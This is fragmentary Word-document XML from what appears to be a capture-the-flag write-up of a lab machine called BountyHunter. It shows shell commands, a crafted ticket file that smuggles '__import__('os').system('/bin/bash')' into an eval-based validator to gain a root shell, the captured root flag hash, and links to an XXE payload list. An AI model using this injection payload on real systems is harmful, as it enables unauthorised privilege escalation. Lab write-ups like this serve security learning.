      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00546651">
        <w:t>l</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00546651" w:rsidRDefault="00D76CD9" w:rsidP="00CD6BC6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="360F8892" wp14:editId="459074A8">
            <wp:extent cx="5943600" cy="7626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CD9" w:rsidRDefault="00093404" w:rsidP="00CD6BC6">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00093404">
        <w:t>development@bountyhunter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00093404">
        <w:t>:~$ cat /opt/skytrain_inc/ticketValidator.py</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00093404" w:rsidRDefault="00734D45" w:rsidP="00CD6BC6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0AC51F24" wp14:editId="6FD9AAA0">
            <wp:extent cx="5762625" cy="69532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D45" w:rsidRDefault="00C223E9" w:rsidP="00CD6BC6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F6A8AED" wp14:editId="50A8EE1E">
            <wp:extent cx="3105150" cy="14954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2D" w:rsidRDefault="00415E2D" w:rsidP="00CD6BC6">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00415E2D">
        <w:t>development@bountyhunter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00415E2D">
        <w:t>:~$ cd /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00415E2D">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00415E2D" w:rsidRPr="00782FA5" w:rsidRDefault="00782FA5" w:rsidP="00782FA5">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00782FA5">
        <w:t>development@bountyhunter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00782FA5">
        <w:t>:/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00782FA5">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00782FA5">
        <w:t>$ cat test.md</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00782FA5" w:rsidRDefault="00782FA5" w:rsidP="00CD6BC6"/>
    <w:p w:rsidR="00EC2F69" w:rsidRDefault="00F76534" w:rsidP="00CD6BC6">
      <w:r>
        <w:t>Code:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E517A7" w:rsidRDefault="00E517A7" w:rsidP="00E517A7">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Skytrain</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Inc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00E517A7" w:rsidRDefault="00E517A7" w:rsidP="00E517A7">
      <w:r>
        <w:t>## Ticket to root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E517A7" w:rsidRDefault="00E517A7" w:rsidP="00E517A7">
      <w:r>
        <w:t>__Ticket Code</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>:_</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>_</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F76534" w:rsidRDefault="00E517A7" w:rsidP="00E517A7">
      <w:r>
        <w:t>**102+ 10 == 112 and __import_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>_(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>'</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>os</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>').system('/bin/bash') == False</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00912690" w:rsidRDefault="00E517A7" w:rsidP="00090A99">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F101A70" wp14:editId="1747F08F">
            <wp:extent cx="5114925" cy="828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950" w:rsidRDefault="00782FA5" w:rsidP="00090A99">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00782FA5">
        <w:t>development@bountyhunter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00782FA5">
        <w:t>:/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00782FA5">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00782FA5">
        <w:t>$</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 777 test.md </w:t>
      </w:r>
      <w:r w:rsidR="00912690">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1FCDC952" wp14:editId="249F6497">
            <wp:extent cx="5943600" cy="12871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21A" w:rsidRDefault="00E2421A" w:rsidP="00090A99">
      <w:r>
        <w:t xml:space="preserve">Root.txt:  </w:t>
      </w:r>
      <w:r w:rsidRPr="00E2421A">
        <w:t>239975d6dab565467f77915310b952b9</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E37A39" w:rsidRDefault="00E37A39" w:rsidP="00090A99">
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="00E37A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4BAC"/>
    <w:rsid w:val="000033E8"/>
    <w:rsid w:val="000119CB"/>
    <w:rsid w:val="00090A99"/>
    <w:rsid w:val="00093404"/>
    <w:rsid w:val="00165A26"/>
    <w:rsid w:val="001D12C7"/>
    <w:rsid w:val="001D4D8D"/>
    <w:rsid w:val="002823A3"/>
    <w:rsid w:val="002A2D39"/>
    <w:rsid w:val="002C313E"/>
    <w:rsid w:val="002F4950"/>
    <w:rsid w:val="00397F4A"/>
    <w:rsid w:val="003A667E"/>
    <w:rsid w:val="00415E2D"/>
    <w:rsid w:val="00426029"/>
    <w:rsid w:val="00447C0B"/>
    <w:rsid w:val="00476528"/>
    <w:rsid w:val="00546651"/>
    <w:rsid w:val="005B3C07"/>
    <w:rsid w:val="0063639D"/>
    <w:rsid w:val="006C1036"/>
    <w:rsid w:val="007302C7"/>
    <w:rsid w:val="00731386"/>
    <w:rsid w:val="00734D45"/>
    <w:rsid w:val="007770CF"/>
    <w:rsid w:val="00782FA5"/>
    <w:rsid w:val="007E22DD"/>
    <w:rsid w:val="007E267A"/>
    <w:rsid w:val="008435BE"/>
    <w:rsid w:val="00896D33"/>
    <w:rsid w:val="008A2E8D"/>
    <w:rsid w:val="008B13FD"/>
    <w:rsid w:val="00912690"/>
    <w:rsid w:val="00982ED0"/>
    <w:rsid w:val="009E4BAC"/>
    <w:rsid w:val="009F276F"/>
    <w:rsid w:val="00A82F69"/>
    <w:rsid w:val="00AE4BB4"/>
    <w:rsid w:val="00B268C9"/>
    <w:rsid w:val="00B833E8"/>
    <w:rsid w:val="00B85DC0"/>
    <w:rsid w:val="00BD64A4"/>
    <w:rsid w:val="00BE5246"/>
    <w:rsid w:val="00C05AA4"/>
    <w:rsid w:val="00C223E9"/>
    <w:rsid w:val="00C7424F"/>
    <w:rsid w:val="00C77701"/>
    <w:rsid w:val="00CD6BC6"/>
    <w:rsid w:val="00D01DD7"/>
    <w:rsid w:val="00D0295C"/>
    <w:rsid w:val="00D67967"/>
    <w:rsid w:val="00D75705"/>
    <w:rsid w:val="00D76CD9"/>
    <w:rsid w:val="00D776CF"/>
    <w:rsid w:val="00DC5626"/>
    <w:rsid w:val="00DD5A58"/>
    <w:rsid w:val="00E23C57"/>
    <w:rsid w:val="00E2421A"/>
    <w:rsid w:val="00E37A39"/>
    <w:rsid w:val="00E517A7"/>
    <w:rsid w:val="00E828DD"/>
    <w:rsid w:val="00EC2F69"/>
    <w:rsid w:val="00EC6921"/>
    <w:rsid w:val="00EE2A5C"/>
    <w:rsid w:val="00F013D4"/>
    <w:rsid w:val="00F15826"/>
    <w:rsid w:val="00F53A0F"/>
    <w:rsid w:val="00F76534"/>
    <w:rsid w:val="00FB648D"/>
    <w:rsid w:val="00FE7C72"/>
    <w:rsid w:val="00FF4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AF1F1"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{F5FF67EC-0076-44DD-B0AA-34644A530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6528"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="hj">
    <w:name w:val="hj"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00F158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41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9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0.10.11.100/portal.php" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ostermiller.org/calc/encode.html" TargetMode="External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github.com/payloadbox/xxe-injection-payload-list" TargetMode="External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hyperlink" Target="http://10.10.11.100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hyperlink" Target="http://10.10.11.100/resources/README.txt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image" Target="media/image1.jpe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mailto:development@10.10.11.100" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://10.10.11.100/resources/" TargetMode="Externa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263</TotalTime>
  <Pages>13</Pages>
  <Words>490</Words>
  <Characters>2796</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>23</Lines>
  <Paragraphs>6</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>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dixit</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>saksham dixit</cp:lastModifiedBy>
  <cp:revision>111</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-07-31T02:40:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-07-31T07:03:00Z</dcterms:modified>
</cp:coreProperties>
</file>